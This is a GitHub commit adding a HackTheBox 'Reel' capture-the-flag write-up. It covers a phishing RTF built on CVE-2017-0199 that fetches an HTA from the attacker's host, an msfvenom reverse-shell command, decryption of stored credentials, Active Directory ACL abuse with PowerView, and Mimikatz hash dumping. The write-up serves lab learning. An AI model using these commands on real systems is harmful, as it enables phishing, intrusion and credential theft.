mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-21 19:43:03 +00:00
Create Reel.md
This commit is contained in:
ARZ
GitHub
parent
2c9497984c
commit
eb3d84102a
1 changed files with 248 additions and 0 deletions
248
HackTheBox/Reel.md
Normal file
248
HackTheBox/Reel.md
Normal file
|
|
@ -0,0 +1,248 @@
|
|||
# HackTheBox-Reel
|
||||
|
||||
## NMAP
|
||||
|
||||
```bash
|
||||
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp Microsoft ftpd
|
||||
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||||
|_05-28-18 11:19PM <DIR> documents
|
||||
| ftp-syst:
|
||||
|_ SYST: Windows_NT
|
||||
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|
||||
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|
||||
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
|
||||
25/tcp open smtp?
|
||||
| fingerprint-strings:
|
||||
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS
|
||||
SessionReq, X11Probe:
|
||||
| 220 Mail Service ready
|
||||
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|
||||
| 220 Mail Service ready
|
||||
| sequence of commands
|
||||
| sequence of commands
|
||||
| Hello:
|
||||
| 220 Mail Service ready
|
||||
| EHLO Invalid domain address.
|
||||
| Help:
|
||||
| 220 Mail Service ready
|
||||
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\
|
||||
| SIPOptions:
|
||||
| 220 Mail Service ready
|
||||
| sequence of commands
|
||||
| sequence of commands
|
||||
| sequence of commands
|
||||
| sequence of commands
|
||||
| sequence of commands
|
||||
| sequence of commands
|
||||
```
|
||||
|
||||
## PORT 21 (FTP)
|
||||
|
||||
FTP has anonymous login enabled so we can easily login
|
||||
|
||||
<img src="https://i.imgur.com/8lfo3A9.png"/>
|
||||
|
||||
We see a folder named `documents`
|
||||
|
||||
<img src="https://i.imgur.com/Hmxbgz1.png"/>
|
||||
|
||||
And in the folder we can see three files
|
||||
|
||||
<img src="https://i.imgur.com/07Sug0q.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/gyYqyet.png"/>
|
||||
|
||||
Opening the `Applocker.docx` file it tell about making rules for some scripts
|
||||
|
||||
<img src="https://i.imgur.com/bTwc6Gr.png"/>
|
||||
|
||||
Opening `Windows Event Forwarding.docx` will warn us having a macro in it and will fail to recover document
|
||||
|
||||
<img src="https://i.imgur.com/zeKF5fV.png"/>
|
||||
|
||||
Lastly the text file has this conent in it
|
||||
|
||||
```
|
||||
Please email me any rtf format procedures - I'll review and convert.
|
||||
new format / converted documents will be saved here.
|
||||
```
|
||||
|
||||
So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? We don't have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running `exiftool` on word documents we get a username
|
||||
|
||||
<img src="https://i.imgur.com/GhhH4B8.png"/>
|
||||
|
||||
|
||||
## PORT 25 (SMTP)
|
||||
|
||||
To check if it's a correct email addres we can use `VRFY` to check but that command is not allowed in this smtp server
|
||||
|
||||
<img src="https://i.imgur.com/rUa9oIS.png"/>
|
||||
|
||||
Instead we can use `RCPT` to check if the email address is valid
|
||||
|
||||
<img src="https://i.imgur.com/cjsrwmJ.png"/>
|
||||
|
||||
And `nico@megabank.com` is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE `CVE-2017-0199`
|
||||
|
||||
|
||||
http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html
|
||||
|
||||
|
||||
## Foothold
|
||||
|
||||
Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to genrate a hta file using `msfvenom`
|
||||
|
||||
```bash
|
||||
sfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh
|
||||
> abc.hta
|
||||
```
|
||||
|
||||
```bash
|
||||
python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1
|
||||
0.14.17/abc.hta
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/LKuZ1Bi.png"/>
|
||||
|
||||
Now to send the mail with the attachment , I was having difficulty to figure out to send it , on goolge every mentioned doing it through telnet by specifiying content-type and other headers but I found a neat tool called `sawks`
|
||||
|
||||
http://www.jetmore.org/john/code/swaks/
|
||||
|
||||
So running this to send an email to `nico` and starting the python server to hosts the hta file
|
||||
|
||||
<img src="https://i.imgur.com/EskSS7h.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/TnR0IJ7.png"/>
|
||||
|
||||
|
||||
```bash
|
||||
swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/ZfUBP2n.png"/>
|
||||
|
||||
In `nico`'s directory in `Desktop` folder we can see a `cred.xml` file, reading that file it seems that there's an encrpyted password for `Tom`
|
||||
|
||||
<img src="https://i.imgur.com/WS6w7eR.png"/>
|
||||
|
||||
## Privilege Escalation (Tom)
|
||||
|
||||
Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse shell would just hang
|
||||
|
||||
<img src="https://i.imgur.com/DEyOAMi.png"/>
|
||||
|
||||
So we can just pass arguemnts to powershell and decrypt the password for user `Tom`
|
||||
|
||||
```powershell
|
||||
powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password"
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/Fi7QfFr.png"/>
|
||||
|
||||
Now that we have credentials for tom user we can use ssh to login
|
||||
|
||||
<img src="https://i.imgur.com/zj1hrz0.png"/>
|
||||
|
||||
Checking which groups this user is in
|
||||
|
||||
<img src="https://i.imgur.com/RCSfCDZ.png"/>
|
||||
|
||||
In the Desktop directory we see a folder `AD Audit` which already has bloodhound folder in it
|
||||
|
||||
<img src="https://i.imgur.com/Cu7vKVv.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/ds5Y1Oh.png"/>
|
||||
|
||||
And from the text file it seems that no path is there to domain admin
|
||||
|
||||
<img src="https://i.imgur.com/8Vzygoj.png"/>
|
||||
|
||||
We can import and run `PowerView` commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine
|
||||
|
||||
<img src="https://i.imgur.com/FHV5ZQw.png"/>
|
||||
|
||||
## Privilege Escalation (Claire)
|
||||
|
||||
So we can bypass this by loading the script in the memory through `IEX` which downloads the script and loads it into the memory
|
||||
|
||||
<img src="https://i.imgur.com/lxa9tC3.png"/>
|
||||
|
||||
```powershell
|
||||
`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip`
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/IVWXQmV.png"/>
|
||||
|
||||
To transfer this we can use impacket's smbserver to copy the zip file onto our machine
|
||||
|
||||
<img src="https://i.imgur.com/bbFqQ3R.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/wBVQaFM.png"/>
|
||||
|
||||
After this is transferred we can use bloodhound GUI to see what we can abuse in AD
|
||||
|
||||
<img src="https://i.imgur.com/BrSZfVH.png"/>
|
||||
|
||||
We have `WriteOwner` access on claire object so we can own this object and give `All` rights on this object in order to reset password
|
||||
|
||||
```powershell
|
||||
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/df0DPbu.png"/>
|
||||
|
||||
```powershell
|
||||
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose
|
||||
```
|
||||
|
||||
<img src="https://i.imgur.com/bcQklfv.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/NYjWuiL.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/OCpunVC.png"/>
|
||||
|
||||
## Privilege Escalation (Administrator)
|
||||
|
||||
Now through `Claire` we can see that we have `WriteDacl` on `BACKUP_ADMINS`
|
||||
|
||||
<img src="https://i.imgur.com/4ed5oV7.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/xKh1pcO.png"/>
|
||||
|
||||
We can see the absue that we can add users to this group
|
||||
|
||||
<img src="https://i.imgur.com/xTlcxEb.png"/>
|
||||
|
||||
So logging in back with tom we see that we are a member of this group now
|
||||
|
||||
<img src="https://i.imgur.com/vKadNmw.png"/>
|
||||
|
||||
But it gets reverted quickly so we need to be quick in navigating to `Administrators` folder and there we will find some backup scripts out which `BackupScript.ps1` has a password for administrator account
|
||||
|
||||
<img src="https://i.imgur.com/eo0KGJE.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/ZX7VbeZ.png"/>
|
||||
|
||||
Having the password we can login through ssh
|
||||
|
||||
<img src="https://i.imgur.com/D8N2dSV.png"/>
|
||||
|
||||
Further loading `Mimikatz` we can dump SAM hashes
|
||||
|
||||
<img src="https://i.imgur.com/kIyKDID.png"/>
|
||||
|
||||
<img src="https://i.imgur.com/AZCJOea.png"/>
|
||||
|
||||
## References
|
||||
|
||||
- https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
|
||||
- https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
|
||||
- https://github.com/bhdresh/CVE-2017-0199
|
||||
- https://linux.die.net/man/1/swaks
|
||||
- http://www.jetmore.org/john/code/swaks/
|
||||
- https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
|
||||
- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
|
||||
Loading…
Reference in a new issue